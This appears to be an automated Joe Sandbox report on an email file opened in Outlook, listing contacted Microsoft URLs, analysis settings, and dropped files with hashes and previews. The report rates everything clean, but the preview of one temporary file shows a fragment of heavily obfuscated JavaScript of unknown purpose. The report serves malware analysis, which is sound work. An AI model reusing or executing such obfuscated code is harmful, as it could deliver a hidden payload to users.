unknown
https://api.microsoftstream.com/api/E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalseunknown
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
  • URL Reputation: safe
unknown
https://cr.office.comE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
  • URL Reputation: safe
unknown
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;hE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    		unknown
    https://messagebroker.mobile.m365.svc.cloud.microsoftE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://otelrules.svc.static.microsoftE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalseunknown
    https://portal.office.com/account/?ref=ClientMeControlE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://clients.config.office.net/c2r/v1.0/DeltaAdvisoryE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://edge.skype.com/registrar/prodE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://graph.ppe.windows.netE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://res.getmicrosoftkey.com/api/redemptioneventsE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://powerlift-frontdesk.acompli.netE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://tasks.office.comE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://officeci.azurewebsites.net/api/E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://sr.outlook.office.net/ws/speech/recognize/assistant/workE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://api.scheduler.E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://my.microsoftpersonalcontent.comE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalseunknown
    https://store.office.cn/addinstemplateE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://api.aadrm.comE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://edge.skype.com/rpsE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://outlook.office.com/autosuggest/api/v1/init?cvid=E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalseunknown
    https://globaldisco.crm.dynamics.comE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://messaging.engagement.office.com/E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://dev0-api.acompli.net/autodetectE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://www.odwebp.svc.msE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://api.diagnosticssdf.office.com/v2/feedbackE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://api.powerbi.com/v1.0/myorg/groupsE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://web.microsoftstream.com/video/E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://api.addins.store.officeppe.com/addinstemplateE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://graph.windows.netE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://dataservice.o365filtering.com/E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://officesetup.getmicrosoftkey.comE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://analysis.windows.net/powerbi/apiE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://prod-global-autodetect.acompli.net/autodetectE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://substrate.office.comE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://outlook.office365.com/autodiscover/autodiscover.jsonE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://consent.config.office.com/consentcheckin/v1.0/consentsE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://learningtools.onenote.com/learningtoolsapi/v2.0/GetvoicesE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://d.docs.live.netE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalseunknown
    https://safelinks.protection.outlook.com/api/GetPolicyE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://ncus.contentsync.E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalseunknown
    https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    http://weather.service.msn.com/data.aspxE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://apis.live.net/v5.0/E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://officepyservice.office.net/service.functionalityE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://templatesmetadata.office.net/E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://messaging.lifecycle.office.com/E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://mss.office.comE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://pushchannel.1drv.msE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://management.azure.comE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://outlook.office365.comE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://wus2.contentsync.E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://incidents.diagnostics.office.comE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://clients.config.office.net/user/v1.0/iosE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://make.powerautomate.comE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://api.addins.omex.office.net/api/addins/searchE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://insertmedia.bing.office.net/odc/insertmediaE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://outlook.office365.com/api/v1.0/me/ActivitiesE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://api.office.netE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://incidents.diagnosticssdf.office.comE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://asgsmsproxyapi.azurewebsites.net/E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://clients.config.office.net/user/v1.0/android/policiesE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://entitlement.diagnostics.office.comE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown
    https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    		unknown

    World Map of Contacted IPs

    No contacted IP infos

    General Information

    Joe Sandbox version:41.0.0 Charoite
    Analysis ID:1532881
    Start date and time:2024-10-14 04:34:44 +02:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 5m 4s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed:6
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:9ba54f65-7bc2-d549-b688-53131649ef52.eml
    Detection:CLEAN
    Classification:clean1.winEML@3/11@0/0
    Cookbook Comments:
    • Found application associated with file extension: .eml

    Warnings

    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
    • Excluded IPs from analysis (whitelisted): 52.109.28.46, 52.113.194.132, 104.208.16.92
    • Excluded domains from analysis (whitelisted): ecs.office.com, slscr.update.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, s-0005-office.config.skype.com, mobile.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, ecs-office.s-0005.s-msedge.net, onedscolprdcus23.centralus.cloudapp.azure.com, s-0005.s-msedge.net, config.officeapps.live.com, officeclient.microsoft.com, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net, mobile.events.data.trafficmanager.net, uks-azsc-config.officeapps.live.com
    • Not all processes where analyzed, report is missing behavior information
    • Report size getting too big, too many NtQueryAttributesFile calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.

    Simulations

    Behavior and APIs

    No simulations

    Joe Sandbox View / Context

    IPs

    No context

    Domains

    No context

    ASNs

    No context

    JA3 Fingerprints

    No context

    Dropped Files

    No context

    Created / dropped Files

    C:\Users\user\AppData\Local\Microsoft\FORMS\FRMCACHE.DAT

    Download File
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
    File Type:data
    Category:dropped
    Size (bytes):231348
    Entropy (8bit):4.381234503527055
    Encrypted:false
    SSDEEP:3072:bSg5xCgWmiGu2/qoQLrt0FvAwJ0iaDp/rL7:bdYmi2S2J0iaDp/rv
    MD5:407B35897A6FF31560D23A21921F4B74
    SHA1:70B3F6FA2BE0CDE84E73DA537884F54137D87815
    SHA-256:5A856661755D63D6CAC9B1C668A312B009350DD31FA2E9BE5AA31C72B541ABFD
    SHA-512:66310EC1D7A4B3EA999520BDD49C091CFF5D684AD5D2F6B70431CB387EF10135029284B8D37DFD89D5B9AA2126CC9E5E9C8085F15C16173500DCDBFCF118C52F
    Malicious:false
    Reputation:low
    Preview:TH02...... ............SM01X...,...................IPM.Activity...........h...............h............H..hl........ H....h........ ...H..h\jon ...ppDa...h.[..0.........h.'.............h........_`.j...h.$..@...I..v...h....H...8..j...0....T...............d.........2h...............k.............!h.............. h~.]..........#h....8.........$h .......8....."h.w.......x....'h..............1h.'..<.........0h....4.....j../h....h......jH..h....p...l.....-h .............+h;&......`................... ..............F7..............FIPM.Activity.st.Form.e..Standard.tanJournal Entry.pdIPM.Microsoft.FolderDesign.FormsDescription................F.k..........1122110020000000.000Microsoft.ofThis form is used to create journal entries.........kf...... ..........&...........(.......(... ...@.....................................................................................................................fffffffff........wwwwwwww.p....pp..............p...............pw..............pw..DDDDO..

    C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\E1A01489-A13D-42EC-BB87-94C7B41EE11D

    Download File
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):178099
    Entropy (8bit):5.2905134907652105
    Encrypted:false
    SSDEEP:1536:ri2XfRAqcbH41gwEwLe7HW8bM/o/NMdcAZl1p5ihs7EXXDEAD2Odago:+Ce7HW8bM/o/TXgk9o
    MD5:246B9AA3DDD00FAC4726A961176AA250
    SHA1:957791B90BA68126E5139CE6EA2DD64E03749FE2
    SHA-256:2A488A16771DDCBFAE2C3FF1CEF97253411EB1D21F6765FFD2DCA6794C4C15C8
    SHA-512:9DFC40CA362B11F18023F7A69366DE822612C9FE0669B2569CEC22589D268F1518B075E50D8BD98F943603BA5F659D8252E2DB9F313CB2C8832FAE063131A488
    Malicious:false
    Reputation:low
    Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2024-10-14T02:36:04">.. Build: 16.0.18204.40137-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://word-edit.officeapps.live.com/we/rrdiscovery.ashx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&amp;p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[

    C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db-shm

    Download File
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
    File Type:data
    Category:dropped
    Size (bytes):32768
    Entropy (8bit):0.04587332210802959
    Encrypted:false
    SSDEEP:3:GtlxtjlDF+ztZfylxtjlDF+ztZf1jR9//8l1lvlll1lllwlvlllglbelDbllAlla:Gt5why5whH9X01PH4l942wU
    MD5:A3A557B88990E64F99D7C3F19686911B
    SHA1:A9FB0BC02369AC92F8CC3A0097E43F66812379AC
    SHA-256:F9DC4FB42F38BBF03018A36EF1315DC952F9A636BF3FB4F7DF634FC2FCA240A8
    SHA-512:02844C4C3CD7470198207A6092B08C90255397F1543903133E7E7E8723AFB3E2A431BE54FC273AE5E1982EB56C5F899F95B1ACDFB03C32CCF62E43202E86AB7B
    Malicious:false
    Reputation:low
    Preview:..-.....................t,....=.a%.J.2../...,,..-.....................t,....=.a%.J.2../...,,........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

    C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db-wal

    Download File
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
    File Type:SQLite Write-Ahead Log, version 3007000
    Category:modified
    Size (bytes):49472
    Entropy (8bit):0.48450738053454545
    Encrypted:false
    SSDEEP:48:/IQ1ZUll7DYMltM0XzO8VFDYM4G2cBO8VFDYML:DUll42tdjVGMjVGC
    MD5:D2EA30853ECC378C4D43BE726AFE1754
    SHA1:3172CF49A81AF8D872D438CEDBFDC5100342C3AD
    SHA-256:5B6A29CEB8B571D2E392EDE5809EAE5481AE344FA8EB5B431D93B28B9EC1AAF0
    SHA-512:5BB85C21CCECF9365C8B8F0CA913BCD7A2FA8A8A4EEF032EF3E35D8D7FDADF744775D3EE7309D040B5073ADC5B942E74F108C1D55916C8FAF878B1CF27CDAF35
    Malicious:false
    Reputation:low
    Preview:7....-...........a%.J.2._.d..'...........a%.J.2.......].SQLite format 3......@ .......................................................................... .............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

    C:\Users\user\AppData\Local\Temp\Diagnostics\OUTLOOK\App1728873360981419200_348717AE-2316-48E1-A0E8-B75EE27AB9FF.log

    Download File
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
    File Type:ASCII text, with very long lines (28775), with CRLF line terminators
    Category:dropped
    Size (bytes):20971520
    Entropy (8bit):0.1609058207313405
    Encrypted:false
    SSDEEP:1536:bvivvq1HTDSpg2ygM0bQLACQul2nvsU3cej82lbv8VPncBI:Oq9qpgibuki
    MD5:160F84DEDC4F97251A490B4D23E370D7
    SHA1:4FD243F7FE83FB415F70BAB042BCBE6CA963BF85
    SHA-256:41682D97810F11FBDBB1DA650750EDD6972067E53A954A034BE3CFE0DFA8D737
    SHA-512:E669E98262934523050F224B4A8BE1FCAF2D7AB98F3E87377D6E6C4B6C87CF1384DDE4C4EE697B80EA37AEDC3CE92F08AE7B97980C5613F482325C97984D7F93
    Malicious:false
    Reputation:low
    Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..10/14/2024 02:36:01.460.OUTLOOK (0x1E98).0x1E9C.Microsoft Outlook.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.GDIAssistant.HandleCallback","Flags":30962256044949761,"InternalSequenceNumber":22,"Time":"2024-10-14T02:36:01.460Z","Contract":"Office.System.Activity","Activity.CV":"rheHNBYj4Uig6Lde4nq5/w.4.9","Activity.Duration":15,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.GdiFamilyName":"","Data.CloudFontStatus":6,"Data.CloudFontTypes":256}...10/14/2024 02:36:01.585.OUTLOOK (0x1E98).0x1E9C.Microsoft Outlook.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.ResourceClient.Deserialize","Flags":30962256044949761,"InternalSequenceNumber":24,"Time":"2024-10-14T02:36:01.585Z","Contract":"Office.System.Activity","Activity.CV":"rheHNBYj4Uig6Lde4nq5/w.4.10","Activity.Duration":85914,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.JsonFileMajorV

    C:\Users\user\AppData\Local\Temp\Diagnostics\OUTLOOK\App1728873360984443300_348717AE-2316-48E1-A0E8-B75EE27AB9FF.log

    Download File
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
    File Type:data
    Category:dropped
    Size (bytes):20971520
    Entropy (8bit):0.0
    Encrypted:false
    SSDEEP:3::
    MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
    SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
    SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
    SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
    Malicious:false
    Reputation:high, very likely benign file
    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

    C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20241013T2236000523-7832.etl

    Download File
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
    File Type:data
    Category:dropped
    Size (bytes):110592
    Entropy (8bit):4.5185413302722095
    Encrypted:false
    SSDEEP:768:cLqjbkxd5uVf+34Asc4GE9Hu4TS6yZXESWcWRhXJVlWiWqkoCUc:ucw4GE9Hu4TS6SXNjUc
    MD5:9317CD50DFFC71A07138C623BBDCD8BF
    SHA1:30A642E5ACAA19EB3BD52D41D734F231B4DB5943
    SHA-256:102FC507CD482100D9142CF86AEA932B90D72263A1AC9F756D03B1EBB1867E66
    SHA-512:EEF45833C65A3000BCE243737B4A03ACD613CE41956690DB4C42A02879103C3B468F0F38B543DF96FBA492B437B78D88C508DA25A9CADC383BF8AFAF0C7ABBDA
    Malicious:false
    Reputation:low
    Preview:............................................................................b.............f.....................eJ..............Zb..2...................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1...........................................................P.'...............f.............v.2._.O.U.T.L.O.O.K.:.1.e.9.8.:.2.5.d.0.1.c.5.4.7.4.0.0.4.f.f.1.8.0.f.a.2.4.7.e.f.d.a.c.9.b.9.d...C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.u.t.l.o.o.k. .L.o.g.g.i.n.g.\.O.U.T.L.O.O.K._.1.6._.0._.1.6.8.2.7._.2.0.1.3.0.-.2.0.2.4.1.0.1.3.T.2.2.3.6.0.0.0.5.2.3.-.7.8.3.2...e.t.l.............P.P...........f.....................................................................................................................................................................................................................................................................................................

    C:\Users\user\AppData\Local\Temp\olkF4F5.tmp

    Download File
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
    File Type:ASCII text, with very long lines (65536), with no line terminators
    Category:dropped
    Size (bytes):246692
    Entropy (8bit):3.82721026417753
    Encrypted:false
    SSDEEP:3072:wfe98RF9aMoZqVOOA9hyjsOv4rzJh/MDBRSAVu3UZEGyLgtxJclL2MBUHSk+E9AD:L
    MD5:592CA644FD0F80879EA360BF30720ED0
    SHA1:E5DB13CE3D2D69C872ADB96352B9BF1329C053CC
    SHA-256:4CB098FAF9EF4C7A9CC96072D114BD19F40B8729BD0F70E5D90D12D149D2CDAD
    SHA-512:B8A50395CA3C8C7D6736ADF727A0EED6497C29FAAD5026A82AE7E9CC41237FD2F85F47158C77C7B7D0FADEC6B20CEADA08D6ACE4CEE31FA3981A62EA1D4C8979
    Malicious:false
    Reputation:low
    Preview:$+lp+(25)[p](30)+c+'('+'"'+'%'+'5'+'9'+'"'+')')()+'2'+'8'+(([]+[])[l]+[])[14]+lp+[][u][l](_+c+y+k+_+lc+' '+k+lc+c+pu+$+lp+(25)[p](30)+c+'('+'"'+'%'+'4'+'7'+'"'+')')()+[][u][l](_+c+y+k+_+lc+' '+k+lc+c+pu+$+lp+(25)[p](30)+c+'('+'"'+'%'+'4'+'6'+'"'+')')()+y+lk+[][u][l](_+c+y+k+_+lc+' '+k+lc+c+pu+$+lp+(25)[p](30)+c+'('+'"'+'%'+'4'+'7'+'"'+')')()+py+(25)[p](30)+pl+[][u][l](_+c+y+k+_+lc+' '+k+lc+c+pu+$+lp+(25)[p](30)+c+'('+'"'+'%'+'4'+'7'+'"'+')')()+(33)[p](34)+'1'+pl+(([]+[])[l]+[])[9]+((![])[l]+[])[9]+'0'+[][u][l](_+c+y+k+_+lc+' '+k+lc+c+pu+$+lp+(25)[p](30)+c+'('+'"'+'%'+'4'+$+'"'+')')()+[][u][l](_+c+y+k+_+lc+' '+k+lc+c+pu+$+lp+(25)[p](30)+c+'('+'"'+'%'+'5'+'7'+'"'+')')()+[][u][l](_+c+y+k+_+lc+' '+k+lc+c+pu+$+lp+(25)[p](30)+c+'('+'"'+'%'+'4'+lp+'"'+')')()+([][u]+[])[23]+pl+((0)[l]+[])[11]+[][u][l](_+c+y+k+_+lc+' '+k+lc+c+pu+$+lp+(25)[p](30)+c+'('+'"'+'%'+'5'+'5'+'"'+')')()+(([]+[])[l]+[])[14]+$+'2'+pk+lu+pl+[][u][l](_+c+y+k+_+lc+' '+k+lc+c+pu+$+lp+(25)[p](30)+c+'('+'"'+'%'+'4'+'7'+'"'+')')

    C:\Users\user\AppData\Roaming\Microsoft\Office\MSO3072.acl

    Download File
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
    File Type:data
    Category:dropped
    Size (bytes):30
    Entropy (8bit):1.2389205950315936
    Encrypted:false
    SSDEEP:3:Y4l7/lt:Y4l7/
    MD5:C57B32652ACD997DF9CB7901A66E6EDC
    SHA1:0278FA5F147F6C3B8FEFA17C629D4CB92B54B89D
    SHA-256:A95F6F5D90048E13C12035D530C3776D76C96F09ED6A4584107EA861C6119AB1
    SHA-512:A86F5040CDADA3BCF0FFB453324A88643CF5640FDC629244A9C250F4A761A44FFBE067260C5E28F39BD217F3DA927D7F68D8361D1A5C53BD6EFA4D32D61242D3
    Malicious:false
    Preview:..../.........................

    C:\Users\user\Documents\Outlook Files\Outlook Data File - NoEmail.pst

    Download File
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
    File Type:Microsoft Outlook email folder (>=2003)
    Category:dropped
    Size (bytes):525312
    Entropy (8bit):4.451016618444054
    Encrypted:false
    SSDEEP:1536:wbm94tI79HlJ0P3YBAcZRL7tCQ1DQDgj/pW53jEpEHP4qQ10PAwr1:wbWCAfljLp9
    MD5:1CDB5921D28ED5576582000EA42AF70E
    SHA1:2C64A8F4BA7A2FC77AB04FC7D621619910E70830
    SHA-256:C760789BC863699793785C1D9625E6D8D356264502C72D67E57DDD2CEEA01DCE
    SHA-512:07A1AE0E2A56710684794E8D297604732E2E05BCA44952872467C86A09B6C9A1CB05BBE4DB367F526C1389EFF8D137487CFC6A3FEDA02B2AB91ACA15803661BA
    Malicious:false
    Preview:!BDNj..SM......\.......................c................@...........@...@...................................@...................................................................................$...............................d...............B..................................................................................................................................................................................................................................................................................(.......I..<.H:.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

    C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp

    Download File
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
    File Type:data
    Category:dropped
    Size (bytes):524288
    Entropy (8bit):4.420403967310337
    Encrypted:false
    SSDEEP:1536:f3jEpEHP4qQ10PAwr1E/dtilHlJ0P3YBA3ZRLWuBOzS0hc+:4p9HX4hc
    MD5:F23EAE9A04398EC0CDB29767E35BAC90
    SHA1:95B7CD9C45E7D32B98D07EBAAFFF44F16080764B
    SHA-256:73054CD7898AC01164E64F3972C76C7956B01B1AD1253D192FB1766BC8CB274A
    SHA-512:581346C50C119A023EB18B157BAC43C90D0A268F9C406357B0F0FE711F6096FCE85712A11E5149F08F87E4F650839A6495B2CB7134E658A1DA6476E4B5A4A4A2
    Malicious:false
    Preview:%.0...............@.........................#.!BDNj..SM......\.......................c................@...........@...@...................................@...................................................................................$...............................d...............B..................................................................................................................................................................................................................................................................................(.......I..<.H:%.0...............@.........................#.%.0...............@.........................#.!BDNj..SM......\.......................c................@...........@...@...................................@...................................................................................$...............................d...............B...................................................................................

    Static File Info

    General

    File type:RFC 822 mail, ASCII text, with CRLF line terminators
    Entropy (8bit):5.170060543608475
    TrID:
    • E-Mail message (Var. 5) (54515/1) 100.00%
    File name:9ba54f65-7bc2-d549-b688-53131649ef52.eml
    File size:525'374 bytes
    MD5:60624e033806c4f3cbaf007f40a20567
    SHA1:30b3376aadd75ae410e80dd634bb0b94c18f9475
    SHA256:e923f8572bcc23f76e60ea7200c48ae370c9648cb79c5bf96fc715f6bd43341a
    SHA512:db7657745057ddfd7652221a78cff32e935d4d33fdca443a60c62406c299da7a9b3d1d6e18902197a3b6cfc16b8f14faf31f137dd99288a6bda307feb0396ca2
    SSDEEP:768:KwShfkz/fTnJY37dYMT+CgbVFHsvtfG+5TOM4oP4arBys1NLJCecDs8sz/K14etl:KijfTnJYLI+tPUDj1cqF7
    TLSH:4CB4EA20833D913EA0964D6909F688EF9BEE55F62BF7A0D01CC25FEB4483229C5E55F1
